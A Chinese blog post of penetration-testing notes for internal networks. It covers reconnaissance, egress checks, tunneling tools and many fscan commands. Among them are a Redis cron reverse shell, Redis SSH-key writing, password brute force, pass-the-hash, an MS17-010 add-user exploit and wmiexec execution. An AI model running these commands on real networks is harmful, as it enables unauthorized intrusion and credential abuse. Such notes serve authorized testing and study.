首页 > 其他分享 >内网渗透工具

内网渗透工具

时间:2024-06-10 16:11:17浏览次数:30  
标签:24 exe 1.1 渗透 192.168 fscan 工具 com

获取网络配置

ipconfig /all
ifconfig
同时通过这个也可以知道是windows还是linux

获取系统信息

systeminfo | findstr /B /C"OS名称 " OS 版本"
systeminfo | findstr /B /C"OSName " OS Version"
其实直接使用systeminfo感觉更靠谱,有些版本格式不一样,查不出来。不如直接使用systeminfo。

使用工具
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

识别杀软网站
https://i.hacking8.com/tiquan/

查看是否出网

ICMP协议

ping www.baidu.com  
tracert baidu.com

TCP/UDP

telnet 192.168.1.108 22        //TCP
nc -zv 39.101.135.232 9999        //TCP
nc -zuv 192.168.1.108 80       //UDP

HTTP/HTTPS


curl http://www.baidu.com      //HTTP
curl https://www.baidu.com     //HTTPS
Linux:wget、curl
Windows:certutil、powershell、bitsadmin、regsrv......

DNS

dig @8.8.8.8 www.baidu.com        //DNS
nslookup www.baidu.com 8.8.8.8    //DNS

获取权限信息

whoami

隧道搭建

当frp搭建不了的时候,使用webshell来进行一个搭流量转发
https://github.com/zema1/suo5

https://github.com/fatedier/frp/releases/tag/v0.58.1

https://github.com/ehang-io/nps/blob/master/README_zh.md

内网扫描

查询arp缓存表

arp -n
arp -a

使用扫描工具

https://github.com/shmilylty/netspy

nohup netspy is &
nohup netspy is -c 10.0.0.1/8 &

https://github.com/shadow1ng/fscan

fscan.exe -h 192.168.1.1/24  -nobr -nopoc  
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
-socks5

域信息获取

参考[[Cobalt Strike使用]]

标签:24,exe,1.1,渗透,192.168,fscan,工具,com
From: https://www.cnblogs.com/Ho1dF0rward/p/18240764

相关文章

  • 超级实用的设计工具CorelDRAW平面设计软件2021精简版下载
    嘿,小伙伴们!今天我要给大家种草一款超级实用的设计工具——CorelDRAW平面设计软件2021精简版!✨这款软件不仅功能强大,而且操作简便,简直是设计师和学生们的福音啊!......
  • Kali Linux 2024.2 发布 (t64, GNOME 46 & Community Packages) - 领先的渗透测试发行
    KaliLinux2024.2发布(t64,GNOME46&CommunityPackages)-领先的渗透测试发行版ThemostadvancedPenetrationTestingDistribution请访问原文链接:https://sysin.org/blog/kali-linux/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgKaliLinux2024.2已......
  • SQL Server Management Studio (SSMS) 20.1 - 微软数据库管理工具
    SQLServerManagementStudio(SSMS)20.1-微软数据库管理工具请访问原文链接:https://sysin.org/blog/ssms/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org笔者注:SQLServer2014及之前版本内置SQLServerManagementStudio(SSMS),SQLServer2016及以后版本......
  • 开源C++静态代码检测工具clang-tidy、cppcheck和oclint的比较
    以下是clang-tidy、cppcheck和oclint的比较关于Clang-Tidy的使用请参考:使用Clang-Tidy进行静态代码分析:完整的配置与CMake集成实例关于Cppcheck的使用请参考:使用Cppcheck进行静态代码分析:完整的shell脚本与CMake集成实例关于OCLint的使用请参考:使用OCLint......
  • mac python 包管理工具 pip 的配置
     python3--versionPython3.12.3brewinstallpython@3.12pip3configsetglobal.index-urlhttps://pypi.tuna.tsinghua.edu.cn/simplepip3configsetglobal.break-system-packagestrue pip3installaiohttppython包管理工具pip的配置 近几年来,python的包......
  • 【Tools】 探索 Chrome DevTools:前端开发者的必备工具
    我已经从你的全世界路过像一颗流星划过命运的天空很多话忍住了不能说出口珍藏在我的心中只留下一些回忆                     ......
  • .NET借助虚拟网卡实现一个简单异地组网工具
    由于工作需要,经常需要远程客户的服务器,但是并不是所有服务器都能开外网端口,使用向日葵等软件终究还是不太方便,于是找了很多工具,包括zerotier等,但是由于服务器在国外等有时候还不同,于是开始自己想办法研究一个属于自己的组网工具,最后找到snltty大佬的 https://github.com/snltty......
  • CMake:构建、打包和测试的跨平台工具系列软件
    介绍CMake是一个开源、跨平台的构建系统,旨在管理软件构建过程。它通过使用简洁的脚本语言描述项目的构建规则,自动生成适用于各种平台的构建文件,如UnixMakefiles、VisualStudio项目和Xcode项目。CMake不仅支持多种编译器和操作系统,还提供了丰富的功能,用于软件的构建、打包和......
  • 自动化运维工具——Saltstack部署及使用
    目录一、简介1.定义2.核心功能3.通信机制二、部署1.配置yum源2.安装服务3.连接认证Master和Minion三、实际运用1.命令格式2.演示操作2.1连通性测试2.2安装软件2.3卸载软件2.4测试模块一、简介1.定义Saltstack是一个配置管理系统(客户端和服务端),能够维护预......
  • 打卡信奥刷题(70)用Scratch图形化工具信奥P1149 [NOIP2008 提高组] 火柴棒等式
    [NOIP2008提高组]火柴棒等式题目描述给你nnn根火柴棍,你可以拼出多少个形如A+......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99